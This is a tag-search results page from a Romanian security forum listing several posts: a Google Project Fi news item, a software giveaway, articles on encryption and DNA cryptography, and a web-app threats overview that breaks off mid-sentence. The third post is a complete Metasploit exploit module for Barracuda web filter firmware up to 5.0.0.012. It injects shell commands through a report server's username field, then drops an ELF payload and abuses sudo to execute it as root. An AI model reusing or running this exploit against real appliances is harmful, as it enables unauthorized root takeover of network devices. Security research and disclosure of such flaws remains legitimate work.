Jump to content

Search the Community

Showing results for tags 'data'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Google launches its own mobile network for Nexus 6 owners Google is now a mobile carrier. Today the company has made official its plan to offer wireless service to owners of its Nexus 6 smartphone. It's called Project Fi, and Google is launching an early invite program beginning today. "Similar to our Nexus hardware program, Project Fi enables us to work in close partnership with leading carriers, hardware makers, and all of you to push the boundaries of what's possible," the company wrote in a blog post. The service is only available for the Nexus 6 and requires a special SIM card for Project FI — it will work with both existing Nexus 6 devices and new ones. Google is says that right now the service is only available as an "early access program," and during that program it won't work on other phones. Google's new offering is unique in that the company will charge consumers only for the data they use rather than hit them with a flat monthly fee that comes with a preset amount of data. If you fail to use all the data you've paid for, Google will refund you the difference. If you go over your plan, Google will simply charge you at a pro-rated rate of $10 per GB. In other words, if you pay for data and don't use it, you get refunded. If you don't buy data and use it, you end up paying the same amount. There are no family plans available, but neither does it require a contract of any kind. As reported previously, Google will operate its wireless service with the help of both T-Mobile and Sprint; customers will have access to both networks, and Google's service will intelligently switch between them and Wi-Fi to maintain strong reception. "We developed new technology that gives you better coverage by intelligently connecting you to the fastest available network at your location whether it's Wi-Fi or one of our two partner LTE networks," the company said. Project Fi also supports voice calls and texting over Wi-Fi, lending subscribers more flexibility and how and where they can communicate with their contacts. Google also says it's using secure tech (there's a key that shows up in your menu bar) for when you're using public Wi-Fi hotspots. Google says Project Fi phone numbers "live in the cloud," according to Google, enabling you to text and place voice calls from a laptop or tablet without your actual phone nearby. When you are on the phone, Google says calls can seamlessly transition to LTE when you leave a Wi-Fi network. Google seems to be using the new, combined Hangouts / Google Voice infrastructure in some way for Fi, as its FAQ references it often. If you're interested in being part of Google's mobile experiment, the signup page is here. Google says it'll be sending out a small number of invites every week starting now. Sursa: Google launches its own mobile network for Nexus 6 owners | The Verge
  2. Tenorshare Any Data Recovery Pro is the most powerful data rescue software that enables you to recover lost, deleted, or formatted photos, videos, documents, emails, and other files from your computer… or any other internal / external / portable media like hard drive, SD card, microSD card, memory card, USB devices, etc. Get it now. Read more at Free Tenorshare Any Data Recovery Pro (100% discount) - SharewareOnSale
  3. # Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit # Exploit Author: xort # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/products/webfilter # Version: Firmware <= 5.0.0.012 # Tested on: Vx and Hardware platforms # # Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating # capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain # root. xort@blacksecurity.org require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root', 'Description' => %q{ This module exploits a remote command execution vulnerability in the Barracuda Firmware Version <= 5.0.0.012 by exploiting a vulnerability in the web administration interface. By sending a specially crafted request it's possible to inject system commands while escalating to root do to relaxed sudo configuration on the local machine. }, 'Author' => [ 'xort', # metasploit module ], 'Version' => '$Revision: 12345 $', 'References' => [ [ 'none', 'none'], ], 'Platform' => [ 'linux'], 'Privileged' => true, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Privileged' => false, 'Payload' => { # note: meterpreter can't run on host do to kernel 2.4 incompatibilities + this is stable 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets' => [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('PASSWORD', [ false, 'Device password', "" ]), OptString.new('ET', [ false, 'Device password', "" ]), OptString.new('USERNAME', [ true, 'Device password', "admin" ]), OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(8000), ], self.class) end def do_login(username, password, et) vprint_status( "Logging into machine with credentials...\n" ) # timeout timeout = 1550; # params password_clear = "admin" real_user = ""; login_state = "out" enc_key = Rex::Text.rand_text_hex(32) et = "1358817515" locale = "en_US" user = username password = Digest::MD5.hexdigest(username+enc_key) enctype = "MD5" password_entry = "" vprint_status( "Starting first routine...\n" ) data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login" vprint_status( "#{data}\n" ) res = send_request_cgi( { 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'cookie' => "", 'data' => data }, timeout) vprint_status( "login got code: #{res.code} ... continuing to second request..." ) File.open("/tmp/output2", 'w+') {|f| f.write(res.body) } # get rid of first yank password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] vprint_status( "password got back = #{password} - et got back = #{et}\n" ) return password, et end def run_command(username, password, et, cmd) vprint_status( "Running Command...\n" ) exploitreq = [ [ "primary_tab", "BASIC" ], [ "secondary_tab","reports" ], [ "realm","" ], [ "auth_type","Local" ], [ "user", username ], [ "password", password ], [ "et",et ], [ "role","" ], [ "locale","en_US" ], [ "q","" ], [ "UPDATE_new_report_time_frame","custom" ], [ "report_start","2013-01-25 01:14" ], [ "report_end","2013-01-25 02:14" ], [ "type","" ], [ "ntlm_server","" ], [ "kerb_server","" ], [ "local_group","changeme" ], [ "ip_group","20.20.108.0/0.0.0.0" ], [ "ip_address__0","" ], [ "ip_address__1","" ], [ "ip_address__2","" ], [ "ip_address__3","" ], [ "netmask__0","" ], [ "netmask__1","" ], [ "netmask__2","" ], [ "netmask__3","" ], [ "UPDATE_new_report_pattern_values","" ], [ "UPDATE_new_report_pattern_text","" ], [ "UPDATE_new_report_filter_destination","domain" ], [ "filter_domain","" ], [ "UPDATE_new_report_filter_domain","" ], [ "UPDATE_new_report_filter_category","" ], [ "UPDATE_new_report_exclude_from","" ], [ "UPDATE_new_report_exclude_to","" ], [ "UPDATE_new_report_exclude_days","" ], [ "allow","allow" ], [ "block","block" ], [ "warn","warn" ], [ "monitor","monitor" ], [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ], [ "UPDATE_new_report_filter_count","10" ], [ "UPDATE_new_report_chart_type","vbar" ], [ "UPDATE_new_report_format","html" ], [ "DEFAULT_new_report_group_expand","No" ], [ "UPDATE_new_report_expand_user_count","5" ], [ "UPDATE_new_report_expand_domain_count","5" ], [ "UPDATE_new_report_expand_cat_count","5" ], [ "UPDATE_new_report_expand_url_count","5" ], [ "UPDATE_new_report_expand_threat_count","5" ], [ "report","on" ], [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_report_id","" ], [ "UPDATE_new_report_enabled","Yes" ], [ "secondary_scope","report" ], [ "secondary_scope_data","" ], [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ], [ "UPDATE_new_report_delivery","external" ], [ "UPDATE_new_report_delivery_dest_email","" ], [ "UPDATE_new_report_server","new" ], [ "UPDATE_new_external_server_type","smb" ], [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_external_server","4.4.4.4" ], [ "UPDATE_new_external_server_port","445" ], [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ], [ "UPDATE_new_external_server_password","asdf" ], [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ], [ "UPDATE_new_report_frequency", "once" ], [ "UPDATE_new_report_split", "no" ], [ "add_report_id","Apply" ], [ "remover","" ] ] data = Rex::MIME::Message.new data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30) exploitreq.each do |xreq| data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"") end post_data = data.to_s post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------") datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0" vprint_status( "sending..." ) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'headers' => { 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'Accept-Language' => "en-US,en;q=0.5" } }) if res.code == 200 vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" ) vprint_status( "password: #{password} et: #{et}\n" ) end vprint_status( "login got code: #{res.code} from report_results.cgi\n" ) File.open("/tmp/output4", 'w+') {|f| f.write(res.body) } end def run_script(username, password, et, cmds) vprint_status( "running script...\n") end def exploit # timeout timeout = 1550; user = "admin" # params real_user = ""; login_state = "out" et = "1358817515" #epoch time locale = "en_US" user = "admin" password = "" enctype = "MD5" password_entry = "" password_clear = "admin" vprint_status("<- Encoding payload to elf string...") elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty? password_clear = "admin" password = datastore['PASSWORD'] et = datastore['ET'] # else - if no 'CMD' string - add code for root shell else password, et = do_login(user, password, et) vprint_status("new password: #{password}\n") end sleep(5) if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] end run_command(user, password, et, cmd) # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm cmd = "echo -ne #{encoded_elf} > /tmp/x ;" cmd += "chmod +x /tmp/x ;" # backup static_routes file cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz" cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes" # execute elf as root cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;" # restore static_routes file cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes" run_command(user, password, et, cmd) sleep(2) handler sleep(5) end end Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
  4. Keeping personal information secure and protected remains a top priority for computer users who now rely heavily on information systems to manage a large part of their personal and business lives. One of the ways to make sure only authorized users have access to information is the use of encryption, a process that transforms data from “cleartext to ciphertext” and back as a means to keep it secret from others. This is done through a combination of hardware- and software-based encryption. The scope is always the prevention of unintended data leakage. The wide variety of types of encryption available (e.g., symmetric- and asymmetric encryption, hardware-based or software-based) can make a person uncertain on which one is best to suit their needs. Each of the cryptographic systems addresses specific aspects of keeping systems secure, so it is important to identify which one is the most appropriate for the situation. This article surveys how to gain cryptographic data protection with a variety of methods and mechanisms for the sake of digital privacy as well as solutions for data-at rest and data-in-motion. It also discusses new encryption techniques. The Need of Encryption for Data Protection Encryption is a necessity for organizations and users that handle sensitive data. Data ought to be secured for the entire duration of their lifecycle (at-rest, in-transit and in-use). Whether they are at rest in storage and databases on site or backed up in a cloud, whether they are sent to end users within organizations or remotely accessed through mobile devices, all data need proper protection and ad-hoc solutions. The growing use of mobile devices to access sensitive data and corporate applications along with the use of cloud solutions for software, storage, hardware and services has opened a new world of security problems. Data loss prevention, security practices and strategies employed (firewalls, IDS, coupled with authentication and access controls) in addition to encryption tools are more important than ever as information are no longer being stored and processed in the safety of companies’ on-site servers and behind firewalls, but are actually being manipulated and transferred through a variety of communication channels. Data protection is nothing new, but it remains a significant challenge for organizations and businesses needing to find better ways to protect user data from unauthorized use. Be it corporate-, personal-, customer- or transaction-data, the risk of theft or loss throughout the lifecycle is massive. With data theft caused by employees and external parties on the rise, businesses risk their reputation, lack of regulatory compliance, and, ultimately, loss of clients. Lack of Encryption Why encrypting? Since a complex password by itself is no longer good enough as a means to protect corporate or personal data, by encrypting the data exchanged between the client and server, any sensitive information can be sent over a network, such as the Internet, with less risk of being intercepted during transit. Plaintext can be easily intercepted by prying eyes and eavesdroppers when transiting in data streams; information can be stolen or altered. Encryption is an effective way of making sure data remain secure. Data, however, is not just vulnerable when in transit. Some of the worst data security breaches noted in the 21st century and pertaining to lack of encryption go far back as 2005 when CardSystems Solutions’ system was hacked and was victim of an SQL Trojan attack; hackers gained access to names and accounts numbers of more than 40 million card holders. Security reports noted that the company never encrypted the data, thus exposing personal info on all its clients. Another noteworthy incident occurred in 2006 with a group of hackers taking advantage of a weak data encryption system at TJX Companies Inc. Poor security on the company’s wireless networks had resulted in massive data theft, and 94 million credit cards were exposed. Another instance that shows the human element being the weakest link in the security chain is the case of the U.S. Department of Veterans Affairs’ unencrypted national database theft. Names, social security numbers and other sensible information were found on a laptop and external hard drive that were both stolen. This episode, also in 2006, affected some 26.5 million veterans, whose personal data was taken in a burglary from a VA analyst’s Maryland home. A more recent event involved Sony’s PlayStation Network that had 12 million unencrypted credit card numbers hacked. In 2012, a NASA laptop was stolen; it contained records of sensitive personal identifiable information of employees and contractors. Lately, news has reported of an unencrypted, password-protected laptop that was stolen at the Community Technology Alliance containing social security numbers and names of 1,177 people. Another device containing data for 2,800 patients was stolen from Northwestern Memorial Health Care. Encryption Solutions As the need for encryption is clear to attempt ensuring the integrity and confidentiality of data, the first decision security professionals need to make is between software-based or hardware-based encryption. Both have pros and cons to be considered and can definitely be applied in a combination of ways to ensure maximum protection according to the users’ needs. Software-based encryption can be extended to all data, devices, and users in an organization. It works well to secure e-mails, instant messaging, data in transit and web sites. These solutions are normally cheaper and easy to customize and update. Common drawbacks are performance degradation and vulnerabilities linked to those of the operating systems in which they operate. Risks are linked also to the ease of being turned off by users. Hardware-based solutions are specific to the device they protect. Full drive encryption (FDE) or solutions like self-encrypted drives (SEDs) are an effective approach that simplifies the deployment of security for data at rest and makes it easier for organizations to manage security of data when stored. The advantage of hardware-based solutions is that they bypass many of the typical drawbacks of software-based solutions like performance degradation or vulnerability to attacks aimed at the encryption key stored in memory. Being encryption available at drive-level, this hardware solution also is perfectly independent by any software or operating system used, and usually cannot be turned off by users. Drawbacks are obvious. Hardware solutions are specific to the devices they protect, and updates can normally be performed only by substituting the device. The Encryption Process & Protecting Data Today One of the basic concepts of encryption is the need for keys to encrypt and decrypt the message. The process of encryption is done with two individual keys – a private key and a public key; this is referred to as asymmetric encryption, while symmetric encryption requires using one key for both steps. Encryption simply acts as a form of digital lock that prevents unauthorized users from accessing data. In addition, by adding a signature with a private key, a person can prove his or her own identity and make tampering with the message more difficult. Just like sensitive messages, the key must also be adequately protected, secured and kept hidden from unauthorized users. A number of encryption methods can be employed to secure data especially when in transit, since that is when they are more vulnerable. The content can be intercepted through some effort of wiretapping or eavesdropping by an intruder. In link-to-link encryption, for example, the message is decrypted at each host as it travels so it is vulnerable if any of the hosts is not secure. This method works well within an organization, for internal use, where all communication nodes security is well known, but might not be the safest method when the message is out in the open. Lately, much attention has been given to end-to-end encryption. This system allows safety of data by ensuring that only the people that are communicating are able to read the message. No one except the sender and the receiver is able to decrypt the message (not even the Internet provider) which is passed from host to host still encrypted. A renowned German e-mail provider, for example, has implemented the use of this methodology for all its users in an attempt to secure their communication from eavesdropping and intrusion. As securing information in a datacenter that requires protection for a multi-vendor infrastructure or the cloud is becoming a widespread need, new solutions and techniques had to be developed to render the transmission of data more secure. In most cases, solutions are needed to be deployed simultaneously on network shares, file services, application and web servers as well as database servers. Techniques like tokenization have been deployed to make sure that data exchanged from different servers and sent to onsite, cloud and mobile end users are still safely handled. In the case of tokenization, for example, data are safely stored and replaced by tokens that are used within an organization to process the information, trigger action and perform tasks. The data never leave their safe storage place and cannot be compromised even if the token is intercepted. This method is extremely helpful when dealing with credit card numbers and financial info in general. Honey encryption, instead, is a technique that can provide additional security when passwords are used as keys. This is particularly effective against conventional brute-force attacks. The concept is simple; in normal circumstances, when intruders intercept a message and attempt to guess the key that encrypts it, all they can get is a manifestly non-usable response. The result is that the malicious hacker continues to attempt until successful. Honey encryption, devised by Juels and Ristenpart, produces a ciphertext that when decrypted with a number of wrong keys gives a “honey message”, a fake plaintext that satisfies the attacker but does not relinquish any real data. Although effective, honey encryption, obviously, is not helpful when the attacker already has a few of the puzzle pieces (for example the public key associated with the private key) and therefore is useless in the protection of HTTPS certificate keys. The method is, however, effective when protecting, for example, password vaults, collections of passwords protected by one master key. An interesting technique for the handling of sensitive data in a cloud environment has been designed by Craig Gentry, a researcher from IBM: Homomorphic encryption. This form of encryption allows users to store data in a cloud encrypted while still being able to analyze and mine data. In fact, computations can be performed on the encrypted data in the cloud server, and only the results are decrypted by the end user. This can be used for any data, including, for example, entire collections of e-mails and messages that could be securely worked on without exposing the messages contained within. Although homomorphic encryption has been explored for 30 years, it is thanks to the work of Gentry (since 2008) that finally the system is being perfected and getting close to having practical applications. Although still too slow and requiring a larger-than-practical number of computations, this type of encryption could soon be applied. DNA Cryptography is another method being explored; it can be defined as hiding data as a DNA Sequence. This technique is based on DNA computing designed by the work of Leonard Max Adleman (the A in RSA) beginning in the year 1994. This modus operandi is still in the initial phases of development, but results are promising. One more is for Quantum Cryptographic tasks and, in particular, QKD (Quantum Key Distribution). Secure communication is ensured by a random key shared by sender and receiver. The advantage of this method is that, as for all quantum systems, a third party that enters it creates a disturbance that can be noted by the sender and receiver. An eavesdropper would cause the communication to be aborted, as the key would not be shared. Conclusion According to data collected by BreachLevelIndex, more than 2 million records per day were breached in the year 2014. It is clear that more and more attention needs to be given to the security of data both at rest and in transit. Coupled with users’ access control, encryption is an effective means of securing sensitive information. Multiple techniques of cryptography are important to ensure data integrity in the three components of the CIA (Confidentiality, Integrity, Availability). Encryption is not just for companies and organizations. Individual users also should consider protecting their own data. With mobile devices now allowing users’ access to all their sensitive information (personal, financial, even medical) and with the growing use of cloud solutions, it is paramount that encryption is adopted and new techniques developed. Currently, many encryption products are available on the market, some are free, and can suit everyone’s needs. With today’s encryption technologies constantly being developed to deliver enhanced security across a range of channels for private communication and storage, there is no reason why this protective measure should not be applied to safeguard data from hackers who continue to develop sophisticated techniques in the attempt to steal information. Whatever the data are and wherever they reside, they ought to be safeguarded: password protected and encrypted. Business data needs to be safe and placed in a secure environment. Failure to apply authentication and end-to-end encryption for limited access to data could lead to possible exposure by intruders. Whatever protection may be necessary depends on the assets that are being protected. Often, businesses requirements and regulatory considerations will dictate what approach is best. Users need to analyze their needs and apply the right products to prevent unauthorized access to information and opt to utilize software and hardware technologies to facilitate the encryption of computer, mobile devices and media. References Allen, L. (2012, August 3). Securing Data on a Moving Target: Self-Encrypting Drives Deliver Top Security, Performance and Manageability. Retrieved from Securing Data on a Moving Target: Self-Encrypting Drives Deliver Top Security, Performance and Manageability | StorageReview.com - Storage Reviews Juels, A. (2014, January 29). Honey Encryption: Security Beyond the Brute-force Bound. Retrieved from http://pages.cs.wisc.edu/~rist/papers/HoneyEncryptionpre.pdf Naone, E. (2011, May/June). Homomorphic Encryption – Making cloud computing more secure. Retrieved from Homomorphic Encryption - MIT Technology Review Olzak, T. (2010, May 7). Choose Encryption Wisely. Retrieved from What is Encryption and When Should You Use it to Protect Data and Computers Paganini, P. (2015, February 20). The Future of Data Security: DNA Cryptography and Cryptosystems. Retrieved from The Future of Data Security: DNA CryptographySecurity Affairs Schneier, B. (2010, June 30). Data at Rest vs. Data in Motion. Retrieved from https://www.schneier.com/blog/archives/2010/06/data_at_rest_vs.html Simonite, T. (2014, January 29). “Honey Encryption” Will Bamboozle Attackers with Fake Secrets. Retrieved from http://www.technologyreview.com/news/523746/honey-encryption-will-bamboozle-attackers-with-fake-secrets/ Source
  5. What is Cryptography? Cryptography is the science of study of secret writing. It helps in encrypting a plain text message to make it unreadable. It is a very ancient art; the root of its origin dates back to when Egyptian scribes used non-standard hieroglyphs in an inscription. Today, electronic or Internet communication has become more prevalent and a vital part of our everyday life. Securing data at rest and data in transit has been a challenge for organizations. Cryptography plays a very important role in the CIA triad of Confidentiality, Integrity and Availability. It provides mathematical techniques related to aspects of information security such as confidentiality, data integrity, entity authentication, and data origin authentication. Over the ages, these techniques have evolved tremendously with technological advancements and growing computing power. Encryption is a component in cryptography or science of secret communication. The part “en” means “to make” and “crypt” means hidden or secret. Encryption can be defined as a process to make information hidden or secret. In this digital age, encryption is based on two major algorithm. Asymmetric or Public key cryptography: Uses two keys, one is a public encryption key and other is a private decryption key. Symmetric or Secret key cryptography: Uses the same key for encryption and decryption processes. Challenges in traditional cryptography The keys used in modern cryptography are so large, in fact, that a billion computers working in conjunction with each processing a billion calculations per second would still take a trillion years to definitively crack a key. Though this doesn’t seem to be a problem now, it soon will be. Quantum computers are going to replace traditional binary computing in the near future. Since they can operate on the quantum level, these computers are expected to be able to perform calculations and operate at speeds no computer in use now could possibly achieve. So the codes that would take a trillion years to break could possibly be cracked in much less time with quantum computers. Traditional cryptography has the problem of key distribution and eavesdropping. Information security expert Rick Smith points out that the secrecy or strength of a cipher ultimately rests on three major things: The infrastructure it runs in: If the cryptography is implemented primarily in software, then the infrastructure will be the weakest link. If Bob and Alice are trying to keep their messages secret, Tom’s best bet is to hack into one of their computers and steal the messages before they’re encrypted. It’s always going to be easier to hack into a system, or infect it with a virus, than to crack a large secret key. In many cases, the easiest way to uncover a secret key might be to eavesdrop on the user and intercept the secret key when it’s passed to the encryption program. Key size: In cryptography, key size matters. If an attacker can’t install a keystroke monitor, then the best way to crack the ciphertext is to try to guess the key through a “brute-force” trial-and-error search. A practical cipher must use a key size that makes brute-force searching impractical. However, since computers get faster every year, the size of a “borderline safe” key keeps growing. Algorithm quality: Cipher flaws can yield “shortcuts” that allow attackers to skip large blocks of keys while doing their trial-and-error search. For example, the well-known compression utility PKZIP traditionally incorporated a custom-built encryption feature that used a 64-bit key. In theory, it should take 264 trials to check all possible keys. In fact, there is a shortcut attack against PKZIP encryption that only requires 227 trials to crack the ciphertext. The only way to find such flaws is to actually try to crack the algorithm, usually by using tricks that have worked against other ciphers. An algorithm usually only shows its quality after being subjected to such analyses and attacks. Even so, the failure to find a flaw today doesn’t guarantee that someone won’t find one eventually. At present, RSA Key length of 2048 bits is considered “Acceptable”. In 2009, researchers were able to crack a 768-bit RSA key and it remains as the current factoring record for the largest general integer. The Lenstra group estimated that factoring a 1024-bit RSA modulus would be about 1,000 times harder than their record effort with the 768-bit modulus, or in other words, on the same hardware, with the same conditions, it would take about 1,000 times as long. Breaking a 2048 bit key would take about 4.3 billion times longer than doing it for a 1024-bit key. A symmetric key algorithm DES is considered to be insecure now since the 56-bit key size it used was too small. Although DES uses a block size of 64-bit, only 56 bits are actually used by the algorithm; the final 8 bits are used for the parity check. In simple words, traditional cryptography and its security are based on difficult mathematical problems which are mature both in theory and realization. Both the secret-key and public-key methods of cryptology have unique flaws. With growth of computing power, the strength of traditional cryptography might become weak and breakable. DNA Computing A new technique for securing data using the biological structure of DNA is called DNA Computing (A.K.A molecular computing or biological computing). It was invented by Leonard Max Adleman in the year 1994 for solving the complex problems such as the directed Hamilton path problem and the NP-complete problem similar to The Traveling Salesman problem. Adleman is also known as the ‘A’ in the RSA algorithm – an algorithm that in some circles has become the de facto standard for industrial-strength encryption of data sent over the Web. The technique later on was extended by various researchers for encrypting and reducing the storage size of data that made the data transmission over the network faster and secured. DNA can be used to store and transmit data. The concept of using DNA computing in the fields of cryptography and steganography has been identified as a possible technology that may bring forward a new hope for unbreakable algorithms. Strands of DNA are long polymers of millions of linked nucleotides. These nucleotides consist of one of four nitrogen bases, a five carbon sugar and a phosphate group. The nucleotides that make up these polymers are named after the nitrogen base that it consists of: Adenine (A), Cytosine ©, Guanine (G) and Thymine (T). Mathematically, this means we can utilize this 4 letter alphabet ? = {A, G, C, T} to encode information, which is more than enough considering that an electronic computer needs only two digits, 1 and 0, for the same purpose. Advantages of DNA computing Speed – Conventional computers can perform approximately 100 MIPS (millions of instruction per second). Combining DNA strands as demonstrated by Adleman made computations equivalent to 10^9 or better, arguably over 100 times faster than the fastest computer. Minimal Storage Requirements – DNA stores memory at a density of about 1 bit per cubic nanometer, where conventional storage media requires 10^12 cubic nanometers to store 1 bit. Minimal Power Requirements – There is no power required for DNA computing while the computation is taking place. The chemical bonds that are the building blocks of DNA happen without any outside power source. There is no comparison to the power requirements of conventional computers. Multiple DNA crypto algorithms have been researched and published, like the Symmetric and Asymmetric Key Crypto System using DNA, DNA Steganography Systems, Triple Stage DNA Cryptography, Encryption algorithms inspired by DNA, and Chaotic computing. DNA Cryptography can be defined as a technique of hiding data in terms of DNA sequence. In the cryptographic technique, each letter of the alphabet is converted into a different combination of the four bases which make up the human deoxyribonucleic acid (DNA). DNA cryptography is a rapid emerging technology which works on concepts of DNA computing. DNA stores a massive amount of information inside the tiny nuclei of living cells. It encodes all the instructions needed to make every living creature on earth. The main advantages of DNA computation are miniaturization and parallelism of conventional silicon-based machines. For example, a square centimeter of silicon can currently support around a million transistors, whereas current manipulation techniques can handle to the order of 1020 strands of DNA. DNA, with its unique data structure and ability to perform many parallel operations, allows one to look at a computational problem from a different point of view. A simple mechanism of transmitting two related messages by hiding the message is not enough to prevent an attacker from breaking the code. DNA Cryptography can have special advantage for secure data storage, authentication, digital signatures, steganography, and so on. DNA can also be used for producing identification cards and tickets. “Trying to build security that will last 20 to 30 years for a defense program is very, very challenging,” says Benjamin Jun, vice president and chief technology officer at Cryptography Research. Multiple studies have been carried out on a variety of biomolecular methods for encrypting and decrypting data that is stored as a DNA. With the right kind of setup, it has the potential to solve huge mathematical problems. It’s hardly surprising then, that DNA computing represents a serious threat to various powerful encryption schemes. Various groups have suggested using the sequence of nucleotides in DNA (A for 00, C for 01, G for 10, T for 11) for just this purpose. One idea is to not even bother encrypting the information but simply burying it in the DNA so it is well hidden, a technique called DNA steganography. DNA Storage of Data has a wide range of capacity: Medium of Ultra-compact Information storage: Very large amounts of data that can be stored in compact volume A gram of DNA contains 1021 DNA bases = 108 Terabytes of data. A few grams of DNA may hold all data stored in the world. Conclusion DNA cryptography is in its infancy. Only in the last few years has work in DNA computing seen real progress. DNA cryptography is even less well studied, but ramped up work in cryptography over the past several years has laid good groundwork for applying DNA methodologies to cryptography and steganography. Researches and studies are being carried out to identify a better and unbreakable cryptographic standard. A number of schemes have been proposed that offer some level of DNA cryptography, and are being explored. At present, work in DNA cryptography is centered on using DNA sequences to encode binary data in some form or another. Though the field is extremely complex and current work is still in the developmental stages, there is a lot of hope that DNA computing will act as a good technique for Information Security. References An Overview of Cryptography Handbook of Applied Cryptography Encryption vs. Cryptography - What is the Difference? Traditional Cryptology Problems - HowStuffWorks Understanding encryption and cryptography basics https://www.digicert.com/TimeTravel/math.htm http://securityaffairs.co/wordpress/33879/security/dna-cryptography.html http://research.ijcaonline.org/volume98/number16/pxc3897733.pdf http://searchsecurity.techtarget.com/answer/How-does-DNA-cryptography-relate-to-company-information-security http://www.technologyreview.com/view/412610/the-emerging-science-of-dna-cryptography/ Source
  6. Web applications are critical to the enterprise infrastructure. Companies rely on them to communicate with partners, clients, shareholders and others, as well as store corporate information, share files, and conduct a host of other operations. These applications are convenient, as their functionality is dependent upon online browsers. However, web applications may have security weaknesses that can expose a single user or the entire organization to multiple threats. Cyber criminals have been focusing on the web in recent years and the trend continues to grow. Cyber attacks are becoming high-profile, getting more sophisticated, and increasing in frequency. According to the Gartner Group, 75 percent of cyber attacks and web security violations occur through Internet applications. Regardless of the development of the application being outsourced or in-house, adversaries examine the infrastructure of an application and its design to identify potential vulnerabilities that can be exploited. High-risk threats to web applications In particular, enterprises need to be aware of the following threats to web applications. The focus is on the wide repertoire of techniques adversaries use to compromise web applications and sites: DoS (Denial of Service): DoS attacks involve hackers overwhelming a web application with multiple requests for information, slowing down the operation of a website or entirely taking it down. A multi-source attack is considered a distributed DoS or DDoS, which routes the malicious traffic through a bigger number of servers. Attackers may also upload dangerous files, which may be downloaded by employees or processed in a corporate environment. Cross-site scripting (XSS): This is a common vulnerability that exploits web application weaknesses to attack users. The attack involves hackers passing data that’s crafted to masquerade legitimate functionality; without proper validation of data, malicious code is transferred to the web browser. In many cases, cyber criminals craft attacks via JavaScript, but attacks may also include Flash, HTML, or another code executed by web browsers. Cross-site scripting enable hackers to steal credentials, hijack sessions, or redirect users to malicious sites. SQL injection: These are random attacks that target applications with weak security to inject malware to extract data or aid virus distribution. These two scenarios are often a result of poor programming. Successful attacks involve hackers modifying the logic of SQL statements against databases. The application, in most cases, builds dynamic query statements, enabling malicious users to work with the data. Consequences can include data corruption, account compromise, or even a complete host takeover. Parameter & buffer manipulation: Websites often use URL parameters to pass information between web pages. Hackers can take advantage of this process and rewrite parameters in malicious ways. They may also manipulate buffers (a small storage allocated for data), andoverload them so that additional data 